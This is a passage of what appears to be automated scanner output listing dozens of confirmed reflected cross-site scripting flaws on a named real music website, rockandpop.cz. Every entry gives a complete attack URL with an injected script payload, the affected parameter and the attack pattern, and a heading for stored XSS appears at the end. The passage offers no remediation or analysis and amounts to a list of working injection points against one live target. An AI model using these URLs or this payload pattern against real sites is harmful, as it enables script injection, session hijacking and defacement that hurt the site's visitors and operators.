  1213. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1214. Parameter Name: Query Based
  1215. Parameter Type: FullQueryString
  1216. Attack Pattern: '"--></style></script><script>alert(0x00060C)</script>
  1217.  
  1218. Severity: Important
  1219. Confirmation: Confirmed
  1220. URL: http://www.rockandpop.cz/zpravy/zahranicni/nove-video-in-due-time-od-killswitch-engage/?'"--></style></script><script>alert(0x00060D)</script>
  1221. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1222. Parameter Name: Query Based
  1223. Parameter Type: FullQueryString
  1224. Attack Pattern: '"--></style></script><script>alert(0x00060D)</script>
  1225.  
  1226. Severity: Important
  1227. Confirmation: Confirmed
  1228. URL: http://www.rockandpop.cz/zpravy/tiskove-zpravy/?'"--></style></script><script>alert(0x000640)</script>
  1229. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1230. Parameter Name: Query Based
  1231. Parameter Type: FullQueryString
  1232. Attack Pattern: '"--></style></script><script>alert(0x000640)</script>
  1233.  
  1234. Severity: Important
  1235. Confirmation: Confirmed
  1236. URL: http://www.rockandpop.cz/zpravy/hledani/?'"--></style></script><script>alert(0x000657)</script>
  1237. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1238. Parameter Name: Query Based
  1239. Parameter Type: FullQueryString
  1240. Attack Pattern: '"--></style></script><script>alert(0x000657)</script>
  1241.  
  1242. Severity: Important
  1243. Confirmation: Confirmed
  1244. URL: http://www.rockandpop.cz/recenze/stone-sour-house-of-gold-bones-pt-1/?'"--></style></script><script>alert(0x0006F1)</script>
  1245. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1246. Parameter Name: Query Based
  1247. Parameter Type: FullQueryString
  1248. Attack Pattern: '"--></style></script><script>alert(0x0006F1)</script>
  1249.  
  1250. Severity: Important
  1251. Confirmation: Confirmed
  1252. URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x0006F0)</script>&uwLanguage=cz
  1253. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1254. Parameter Name: request
  1255. Parameter Type: Querystring
  1256. Attack Pattern: '"--></style></script><script>alert(0x0006F0)</script>
  1257.  
  1258. Severity: Important
  1259. Confirmation: Confirmed
  1260. URL: http://www.rockandpop.cz/recenze/sister-sin-now-and-forever/?'"--></style></script><script>alert(0x0006F2)</script>
  1261. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1262. Parameter Name: Query Based
  1263. Parameter Type: FullQueryString
  1264. Attack Pattern: '"--></style></script><script>alert(0x0006F2)</script>
  1265.  
  1266. Severity: Important
  1267. Confirmation: Confirmed
  1268. URL: http://www.rockandpop.cz/recenze/pipes-and-pints-found-and-lost/?'"--></style></script><script>alert(0x000711)</script>
  1269. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1270. Parameter Name: Query Based
  1271. Parameter Type: FullQueryString
  1272. Attack Pattern: '"--></style></script><script>alert(0x000711)</script>
  1273.  
  1274. Severity: Important
  1275. Confirmation: Confirmed
  1276. URL: http://www.rockandpop.cz/recenze/punk-goes-pop-5/?'"--></style></script><script>alert(0x00070D)</script>
  1277. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1278. Parameter Name: Query Based
  1279. Parameter Type: FullQueryString
  1280. Attack Pattern: '"--></style></script><script>alert(0x00070D)</script>
  1281.  
  1282. Severity: Important
  1283. Confirmation: Confirmed
  1284. Detection Accuracy :
  1285. URL: http://www.rockandpop.cz/recenze/?page='"--></style></script><script>alert(0x000719)</script>
  1286. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1287. Parameter Name: page
  1288. Parameter Type: Querystring
  1289. Attack Pattern: '"--></style></script><script>alert(0x000719)</script>
  1290.  
  1291. Severity: Important
  1292. Confirmation: Confirmed
  1293. Detection Accuracy :
  1294. URL: http://www.rockandpop.cz/recenze/please-the-trees-a-forest-affair/?'"--></style></script><script>alert(0x00072D)</script>
  1295. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1296. Parameter Name: Query Based
  1297. Parameter Type: FullQueryString
  1298. Attack Pattern: '"--></style></script><script>alert(0x00072D)</script>
  1299.  
  1300. Severity: Important
  1301. Confirmation: Confirmed
  1302. URL: http://www.rockandpop.cz/recenze/devil-sold-his-soul-empire-of-light/?'"--></style></script><script>alert(0x000732)</script>
  1303. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1304. Parameter Name: Query Based
  1305. Parameter Type: FullQueryString
  1306. Attack Pattern: '"--></style></script><script>alert(0x000732)</script>
  1307.  
  1308. Severity: Important
  1309. Confirmation: Confirmed
  1310. URL: http://www.rockandpop.cz/recenze/yellowcard-southern-air/?'"--></style></script><script>alert(0x000746)</script>
  1311. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1312. Parameter Name: Query Based
  1313. Parameter Type: FullQueryString
  1314. Attack Pattern: '"--></style></script><script>alert(0x000746)</script>
  1315.  
  1316. Severity: Important
  1317. Confirmation: Confirmed
  1318. URL: http://www.rockandpop.cz/recenze/whitechapel-whitechapel/?'"--></style></script><script>alert(0x000747)</script>
  1319. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1320. Parameter Name: Query Based
  1321. Parameter Type: FullQueryString
  1322. Attack Pattern: '"--></style></script><script>alert(0x000747)</script>
  1323.  
  1324. Severity: Important
  1325. Confirmation: Confirmed
  1326. Detection Accuracy :
  1327. URL: http://www.rockandpop.cz/recenze/dvd/?'"--></style></script><script>alert(0x000765)</script>
  1328. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1329. Parameter Name: Query Based
  1330. Parameter Type: FullQueryString
  1331. Attack Pattern: '"--></style></script><script>alert(0x000765)</script>
  1332.  
  1333. Severity: Important
  1334. Confirmation: Confirmed
  1335. Detection Accuracy :
  1336. URL: http://www.rockandpop.cz/recenze/hledani/?'"--></style></script><script>alert(0x00078E)</script>
  1337. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1338. Parameter Name: Query Based
  1339. Parameter Type: FullQueryString
  1340. Attack Pattern: '"--></style></script><script>alert(0x00078E)</script>
  1341.  
  1342. Severity: Important
  1343. Confirmation: Confirmed
  1344. URL: http://www.rockandpop.cz/stitky/autori/?'"--></style></script><script>alert(0x00079A)</script>
  1345. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1346. Parameter Name: Query Based
  1347. Parameter Type: FullQueryString
  1348. Attack Pattern: '"--></style></script><script>alert(0x00079A)</script>
  1349.  
  1350. Severity: Important
  1351. Confirmation: Confirmed
  1352. URL: http://www.rockandpop.cz/live/cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x00079C)</script>
  1353. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1354. Parameter Name: Query Based
  1355. Parameter Type: FullQueryString
  1356. Attack Pattern: '"--></style></script><script>alert(0x00079C)</script>
  1357.  
  1358. Severity: Important
  1359. Confirmation: Confirmed
  1360. URL: http://www.rockandpop.cz/stitky/?'"--></style></script><script>alert(0x0007A6)</script>
  1361. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1362. Parameter Name: Query Based
  1363. Parameter Type: FullQueryString
  1364. Attack Pattern: '"--></style></script><script>alert(0x0007A6)</script>
  1365.  
  1366. Severity: Important
  1367. Confirmation: Confirmed
  1368. URL: http://www.rockandpop.cz/stitky/autori/ondrej-platzer/?'"--></style></script><script>alert(0x0007B2)</script>
  1369. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1370. Parameter Name: Query Based
  1371. Parameter Type: FullQueryString
  1372. Attack Pattern: '"--></style></script><script>alert(0x0007B2)</script>
  1373.  
  1374. Severity: Important
  1375. Confirmation: Confirmed
  1376. URL: http://www.rockandpop.cz/live/asking-alexandria-while-she-sleeps-motionless-in-white-betraying-the-martyrs-roxy-praha/?'"--></style></script><script>alert(0x0007D4)</script>
  1377. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1378. Parameter Name: Query Based
  1379. Parameter Type: FullQueryString
  1380. Attack Pattern: '"--></style></script><script>alert(0x0007D4)</script>
  1381.  
  1382. Severity: Important
  1383. Confirmation: Confirmed
  1384. URL: http://www.rockandpop.cz/live/beneficni-koncert-pro-zvirata-v-nouzi-vol-2-plzen-divadlo-pod-lampou/?'"--></style></script><script>alert(0x00081E)</script>
  1385. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1386. Parameter Name: Query Based
  1387. Parameter Type: FullQueryString
  1388. Attack Pattern: '"--></style></script><script>alert(0x00081E)</script>
  1389.  
  1390. Severity: Important
  1391. Confirmation: Confirmed
  1392. URL: http://www.rockandpop.cz/live/parkway-drive-emmure-the-word-alive-structures-meet-factory-praha/?'"--></style></script><script>alert(0x00081F)</script>
  1393. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1394. Parameter Name: Query Based
  1395. Parameter Type: FullQueryString
  1396. Attack Pattern: '"--></style></script><script>alert(0x00081F)</script>
  1397.  
  1398. Severity: Important
  1399. Confirmation: Confirmed
  1400. URL: http://www.rockandpop.cz/live/?page='"--></style></script><script>alert(0x000825)</script>
  1401. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1402. Parameter Name: page
  1403. Parameter Type: Querystring
  1404. Attack Pattern: '"--></style></script><script>alert(0x000825)</script>
  1405.  
  1406. Severity: Important
  1407. Confirmation: Confirmed
  1408. URL: http://www.rockandpop.cz/live/sunshine-rozpoutali-v-plzni-hotovy-karmageddon/?'"--></style></script><script>alert(0x00082F)</script>
  1409. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1410. Parameter Name: Query Based
  1411. Parameter Type: FullQueryString
  1412. Attack Pattern: '"--></style></script><script>alert(0x00082F)</script>
  1413.  
  1414. Severity: Important
  1415. Confirmation: Confirmed
  1416. URL: http://www.rockandpop.cz/live/seal-rozvasnil-karlovarskou-kv-arenu/?'"--></style></script><script>alert(0x00082A)</script>
  1417. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1418. Parameter Name: Query Based
  1419. Parameter Type: FullQueryString
  1420. Attack Pattern: '"--></style></script><script>alert(0x00082A)</script>
  1421.  
  1422. Severity: Important
  1423. Confirmation: Confirmed
  1424. Detection Accuracy :
  1425. URL: http://www.rockandpop.cz/live/muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000831)</script>
  1426. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1427. Parameter Name: Query Based
  1428. Parameter Type: FullQueryString
  1429. Attack Pattern: '"--></style></script><script>alert(0x000831)</script>
  1430.  
  1431. Severity: Important
  1432. Confirmation: Confirmed
  1433. Detection Accuracy :
  1434. URL: http://www.rockandpop.cz/live/into-darkness-tour-2012-17-11-masters-of-rock-cafe-zlin/?'"--></style></script><script>alert(0x000835)</script>
  1435. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1436. Parameter Name: Query Based
  1437. Parameter Type: FullQueryString
  1438. Attack Pattern: '"--></style></script><script>alert(0x000835)</script>
  1439.  
  1440. Severity: Important
  1441. Confirmation: Confirmed
  1442. URL: http://www.rockandpop.cz/live/tribal-theory-pokrtili-v-andelu-debutove-album/?'"--></style></script><script>alert(0x000847)</script>
  1443. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1444. Parameter Name: Query Based
  1445. Parameter Type: FullQueryString
  1446. Attack Pattern: '"--></style></script><script>alert(0x000847)</script>
  1447.  
  1448. Severity: Important
  1449. Confirmation: Confirmed
  1450. Detection Accuracy :
  1451. URL: http://www.rockandpop.cz/live/pipes-and-pints-pokrtili-novinku/?'"--></style></script><script>alert(0x000848)</script>
  1452. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1453. Parameter Name: Query Based
  1454. Parameter Type: FullQueryString
  1455. Attack Pattern: '"--></style></script><script>alert(0x000848)</script>
  1456.  
  1457. Severity: Important
  1458. Confirmation: Confirmed
  1459. Detection Accuracy :
  1460. URL: http://www.rockandpop.cz/live/co-kdy-kde/?'"--></style></script><script>alert(0x00088F)</script>
  1461. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1462. Parameter Name: Query Based
  1463. Parameter Type: FullQueryString
  1464. Attack Pattern: '"--></style></script><script>alert(0x00088F)</script>
  1465.  
  1466. Severity: Important
  1467. Confirmation: Confirmed
  1468. Detection Accuracy :
  1469. URL: http://www.rockandpop.cz/live/hledani/?'"--></style></script><script>alert(0x0008B3)</script>
  1470. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1471. Parameter Name: Query Based
  1472. Parameter Type: FullQueryString
  1473. Attack Pattern: '"--></style></script><script>alert(0x0008B3)</script>
  1474.  
  1475. Severity: Important
  1476. Confirmation: Confirmed
  1477. Detection Accuracy :
  1478. URL: http://www.rockandpop.cz/clanky/daniela-safarikova-2k12/?'"--></style></script><script>alert(0x0008B4)</script>
  1479. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1480. Parameter Name: Query Based
  1481. Parameter Type: FullQueryString
  1482. Attack Pattern: '"--></style></script><script>alert(0x0008B4)</script>
  1483.  
  1484. Severity: Important
  1485. Confirmation: Confirmed
  1486. Detection Accuracy :
  1487. URL: http://www.rockandpop.cz/clanky/while-she-sleeps:-nase-jmeno-pochazi-od-chlapka-ktery-prisel-o-svou-chloubu/?'"--></style></script><script>alert(0x0008B6)</script>
  1488. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1489. Parameter Name: Query Based
  1490. Parameter Type: FullQueryString
  1491. Attack Pattern: '"--></style></script><script>alert(0x0008B6)</script>
  1492.  
  1493. Severity: Important
  1494. Confirmation: Confirmed
  1495. Detection Accuracy :
  1496. URL: http://www.rockandpop.cz/clanky/tomas-franta-2k12/?'"--></style></script><script>alert(0x0008C0)</script>
  1497. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1498. Parameter Name: Query Based
  1499. Parameter Type: FullQueryString
  1500. Attack Pattern: '"--></style></script><script>alert(0x0008C0)</script>
  1501.  
  1502. Severity: Important
  1503. Confirmation: Confirmed
  1504. Detection Accuracy :
  1505. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-nylon-jail/?'"--></style></script><script>alert(0x0008B7)</script>
  1506. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1507. Parameter Name: Query Based
  1508. Parameter Type: FullQueryString
  1509. Attack Pattern: '"--></style></script><script>alert(0x0008B7)</script>
  1510.  
  1511. Severity: Important
  1512. Confirmation: Confirmed
  1513. Detection Accuracy :
  1514. URL: http://www.rockandpop.cz/clanky/jirka-mohl-2k12/?'"--></style></script><script>alert(0x0008C5)</script>
  1515. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1516. Parameter Name: Query Based
  1517. Parameter Type: FullQueryString
  1518. Attack Pattern: '"--></style></script><script>alert(0x0008C5)</script>
  1519.  
  1520.  
  1521. Severity: Important
  1522. Confirmation: Confirmed
  1523. Detection Accuracy :
  1524. URL: http://www.rockandpop.cz/clanky/?page='"--></style></script><script>alert(0x0008C9)</script>
  1525. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1526. Parameter Name: page
  1527. Parameter Type: Querystring
  1528. Attack Pattern: '"--></style></script><script>alert(0x0008C9)</script>
  1529.  
  1530. Severity: Important
  1531. Confirmation: Confirmed
  1532. Detection Accuracy :
  1533. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-ille/?'"--></style></script><script>alert(0x0008F5)</script>
  1534. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1535. Parameter Name: Query Based
  1536. Parameter Type: FullQueryString
  1537. Attack Pattern: '"--></style></script><script>alert(0x0008F5)</script>
  1538.  
  1539. Severity: Important
  1540. Confirmation: Confirmed
  1541. Detection Accuracy :
  1542. URL: http://www.rockandpop.cz/clanky/top-15-apokalyptickych-pisni/?'"--></style></script><script>alert(0x000918)</script>
  1543. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1544. Parameter Name: Query Based
  1545. Parameter Type: FullQueryString
  1546. Attack Pattern: '"--></style></script><script>alert(0x000918)</script>
  1547.  
  1548. Severity: Important
  1549. Confirmation: Confirmed
  1550. Detection Accuracy :
  1551. URL: http://www.rockandpop.cz/clanky/usi:-jak-to-slysi/?'"--></style></script><script>alert(0x00092D)</script>
  1552. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1553. Parameter Name: Query Based
  1554. Parameter Type: FullQueryString
  1555. Attack Pattern: '"--></style></script><script>alert(0x00092D)</script>
  1556.  
  1557. Severity: Important
  1558. Confirmation: Confirmed
  1559. Detection Accuracy :
  1560. URL: http://www.rockandpop.cz/clanky/hledani/?'"--></style></script><script>alert(0x000942)</script>
  1561. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1562. Parameter Name: Query Based
  1563. Parameter Type: FullQueryString
  1564. Attack Pattern: '"--></style></script><script>alert(0x000942)</script>
  1565.  
  1566. Severity: Important
  1567. Confirmation: Confirmed
  1568. Detection Accuracy :
  1569. URL: http://www.rockandpop.cz/casopis/rock-pop-1-13/?'"--></style></script><script>alert(0x00096C)</script>
  1570. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1571. Parameter Name: Query Based
  1572. Parameter Type: FullQueryString
  1573. Attack Pattern: '"--></style></script><script>alert(0x00096C)</script>
  1574.  
  1575. Severity: Important
  1576. Confirmation: Confirmed
  1577. Detection Accuracy :
  1578. URL: http://www.rockandpop.cz/casopis/rock-pop-11-12/?'"--></style></script><script>alert(0x000985)</script>
  1579. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1580. Parameter Name: Query Based
  1581. Parameter Type: FullQueryString
  1582. Attack Pattern: '"--></style></script><script>alert(0x000985)</script>
  1583.  
  1584. Severity: Important
  1585. Confirmation: Confirmed
  1586. Detection Accuracy :
  1587. URL: http://www.rockandpop.cz/casopis/rock-pop-10-12/?'"--></style></script><script>alert(0x00098F)</script>
  1588. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1589. Parameter Name: Query Based
  1590. Parameter Type: FullQueryString
  1591. Attack Pattern: '"--></style></script><script>alert(0x00098F)</script>
  1592.  
  1593. Severity: Important
  1594. Confirmation: Confirmed
  1595. Detection Accuracy :
  1596. URL: http://www.rockandpop.cz/casopis/?page='"--></style></script><script>alert(0x000992)</script>
  1597. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1598. Parameter Name: page
  1599. Parameter Type: Querystring
  1600. Attack Pattern: '"--></style></script><script>alert(0x000992)</script>
  1601.  
  1602. Severity: Important
  1603. Confirmation: Confirmed
  1604. Detection Accuracy :
  1605. URL: http://www.rockandpop.cz/casopis/rock-pop-9-12/?'"--></style></script><script>alert(0x0009A4)</script>
  1606. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1607. Parameter Name: Query Based
  1608. Parameter Type: FullQueryString
  1609. Attack Pattern: '"--></style></script><script>alert(0x0009A4)</script>
  1610.  
  1611. Severity: Important
  1612. Confirmation: Confirmed
  1613. Detection Accuracy :
  1614. URL: http://www.rockandpop.cz/casopis/rock-pop-8-12/?'"--></style></script><script>alert(0x0009AA)</script>
  1615. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1616. Parameter Name: Query Based
  1617. Parameter Type: FullQueryString
  1618. Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
  1619.  
  1620. Severity: Important
  1621. Confirmation: Confirmed
  1622. Detection Accuracy :
  1623. URL: http://www.rockandpop.cz/casopis/rock-pop-7-12/?'"--></style></script><script>alert(0x0009AE)</script>
  1624. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1625. Parameter Name: Query Based
  1626. Parameter Type: FullQueryString
  1627. Attack Pattern: '"--></style></script><script>alert(0x0009AE)</script>
  1628.  
  1629. Severity: Important
  1630. Confirmation: Confirmed
  1631. Detection Accuracy :
  1632. URL: http://www.rockandpop.cz/casopis/rock-pop-6-12/?'"--></style></script><script>alert(0x0009F4)</script>
  1633. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1634. Parameter Name: Query Based
  1635. Parameter Type: FullQueryString
  1636. Attack Pattern: '"--></style></script><script>alert(0x0009F4)</script>
  1637.  
  1638. Severity: Important
  1639. Confirmation: Confirmed
  1640. Detection Accuracy :
  1641. URL: http://www.rockandpop.cz/casopis/5-12/?'"--></style></script><script>alert(0x0009FB)</script>
  1642. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1643. Parameter Name: Query Based
  1644. Parameter Type: FullQueryString
  1645. Attack Pattern: '"--></style></script><script>alert(0x0009FB)</script>
  1646.  
  1647. Severity: Important
  1648. Confirmation: Confirmed
  1649. Detection Accuracy :
  1650. URL: http://www.rockandpop.cz/casopis/uvodnik/?'"--></style></script><script>alert(0x000A0C)</script>
  1651. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1652. Parameter Name: Query Based
  1653. Parameter Type: FullQueryString
  1654. Attack Pattern: '"--></style></script><script>alert(0x000A0C)</script>
  1655.  
  1656. Severity: Important
  1657. Confirmation: Confirmed
  1658. Detection Accuracy :
  1659. URL: http://www.rockandpop.cz/casopis/rozhovory/?'"--></style></script><script>alert(0x000A1E)</script>
  1660. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1661. Parameter Name: Query Based
  1662. Parameter Type: FullQueryString
  1663. Attack Pattern: '"--></style></script><script>alert(0x000A1E)</script>
  1664.  
  1665. Severity: Important
  1666. Confirmation: Confirmed
  1667. Detection Accuracy :
  1668. URL: http://www.rockandpop.cz/casopis/recenze/?'"--></style></script><script>alert(0x000A20)</script>
  1669. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1670. Parameter Name: Query Based
  1671. Parameter Type: FullQueryString
  1672. Attack Pattern: '"--></style></script><script>alert(0x000A20)</script>
  1673.  
  1674. Severity: Important
  1675. Confirmation: Confirmed
  1676. Detection Accuracy :
  1677. URL: http://www.rockandpop.cz/casopis/elektronicky-casopis/?'"--></style></script><script>alert(0x000A23)</script>
  1678. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1679. Parameter Name: Query Based
  1680. Parameter Type: FullQueryString
  1681. Attack Pattern: '"--></style></script><script>alert(0x000A23)</script>
  1682.  
  1683. Severity: Important
  1684. Confirmation: Confirmed
  1685. Detection Accuracy :
  1686. URL: http://www.rockandpop.cz/zpravy/zahranicni/?page='"--></style></script><script>alert(0x000A26)</script>
  1687. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1688. Parameter Name: page
  1689. Parameter Type: Querystring
  1690. Attack Pattern: '"--></style></script><script>alert(0x000A26)</script>
  1691.  
  1692. Confirmation: Confirmed
  1693. Detection Accuracy :
  1694. URL: http://www.rockandpop.cz/casopis/prodejni-mista/?'"--></style></script><script>alert(0x000A2C)</script>
  1695. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1696. Parameter Name: Query Based
  1697. Parameter Type: FullQueryString
  1698. Attack Pattern: '"--></style></script><script>alert(0x000A2C)</script>
  1699.  
  1700. Severity: Important
  1701. Confirmation: Confirmed
  1702. Detection Accuracy :
  1703. URL: http://www.rockandpop.cz/casopis/hledani/?'"--></style></script><script>alert(0x000A42)</script>
  1704. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1705. Parameter Name: Query Based
  1706. Parameter Type: FullQueryString
  1707. Attack Pattern: '"--></style></script><script>alert(0x000A42)</script>
  1708.  
  1709. Severity: Important
  1710. Confirmation: Confirmed
  1711. Detection Accuracy :
  1712. URL: http://www.rockandpop.cz/casopis/vydavatel/?'"--></style></script><script>alert(0x000A39)</script>
  1713. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1714. Parameter Name: Query Based
  1715. Parameter Type: FullQueryString
  1716. Attack Pattern: '"--></style></script><script>alert(0x000A39)</script>
  1717.  
  1718. Severity: Important
  1719. Confirmation: Confirmed
  1720. Detection Accuracy :
  1721. URL: http://www.rockandpop.cz/video/kuriozity/skryva-se-cobain-v-jizni-americe/?'"--></style></script><script>alert(0x000AAA)</script>
  1722. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1723. Parameter Name: Query Based
  1724. Parameter Type: FullQueryString
  1725. Attack Pattern: '"--></style></script><script>alert(0x000AAA)</script>
  1726.  
  1727. Severity: Important
  1728. Confirmation: Confirmed
  1729. Detection Accuracy :
  1730. URL: http://www.rockandpop.cz/video/videoklipy/?'"--></style></script><script>alert(0x000ABE)</script>
  1731. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1732. Parameter Name: Query Based
  1733. Parameter Type: FullQueryString
  1734. Attack Pattern: '"--></style></script><script>alert(0x000ABE)</script>
  1735.  
  1736. Severity: Important
  1737. Confirmation: Confirmed
  1738. Detection Accuracy :
  1739. URL: http://www.rockandpop.cz/video/videoklipy/a-banquet-climb-the-hill/?'"--></style></script><script>alert(0x000B08)</script>
  1740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1741. Parameter Name: Query Based
  1742. Parameter Type: FullQueryString
  1743. Attack Pattern: '"--></style></script><script>alert(0x000B08)</script>
  1744.  
  1745. Severity: Important
  1746. Confirmation: Confirmed
  1747. Detection Accuracy :
  1748. URL: http://www.rockandpop.cz/video/videoklipy/pure-love-beach-of-diamonds/?'"--></style></script><script>alert(0x000B12)</script>
  1749. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1750. Parameter Name: Query Based
  1751. Parameter Type: FullQueryString
  1752. Attack Pattern: '"--></style></script><script>alert(0x000B12)</script>
  1753.  
  1754. Severity: Important
  1755. Confirmation: Confirmed
  1756. Detection Accuracy :
  1757. URL: http://www.rockandpop.cz/video/videoklipy/rihanna-diamonds/?'"--></style></script><script>alert(0x000B46)</script>
  1758. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1759. Parameter Name: Query Based
  1760. Parameter Type: FullQueryString
  1761. Attack Pattern: '"--></style></script><script>alert(0x000B46)</script>
  1762.  
  1763. Severity: Important
  1764. Confirmation: Confirmed
  1765. Detection Accuracy :
  1766. URL: http://www.rockandpop.cz/video/videoklipy/kieslowski-kratka-pisen-o-zabijeni/?'"--></style></script><script>alert(0x000B57)</script>
  1767. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1768. Parameter Name: Query Based
  1769. Parameter Type: FullQueryString
  1770. Attack Pattern: '"--></style></script><script>alert(0x000B57)</script>
  1771.  
  1772. Severity: Important
  1773. Confirmation: Confirmed
  1774. Detection Accuracy :
  1775. URL: http://www.rockandpop.cz/video/videoklipy/bjork-mutual-core/?'"--></style></script><script>alert(0x000B5A)</script>
  1776. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1777. Parameter Name: Query Based
  1778. Parameter Type: FullQueryString
  1779. Attack Pattern: '"--></style></script><script>alert(0x000B5A)</script>
  1780.  
  1781. Severity: Important
  1782. Confirmation: Confirmed
  1783. Detection Accuracy :
  1784. URL: http://www.rockandpop.cz/video/videoklipy/sufjan-stevens-silver-gold/?'"--></style></script><script>alert(0x000B6F)</script>
  1785. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1786. Parameter Name: Query Based
  1787. Parameter Type: FullQueryString
  1788. Attack Pattern: '"--></style></script><script>alert(0x000B6F)</script>
  1789.  
  1790. Severity: Important
  1791. Confirmation: Confirmed
  1792. Detection Accuracy :
  1793. URL: http://www.rockandpop.cz/video/videoklipy/the-tigger-lillies-living-hell/?'"--></style></script><script>alert(0x000B99)</script>
  1794. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1795. Parameter Name: Query Based
  1796. Parameter Type: FullQueryString
  1797. Attack Pattern: '"--></style></script><script>alert(0x000B99)</script>
  1798.  
  1799. ||| Permanent XSS (Cross-site Scripting)
  1800.  
  1801. Severity: Important
  1802. Confirmation: Confirmed
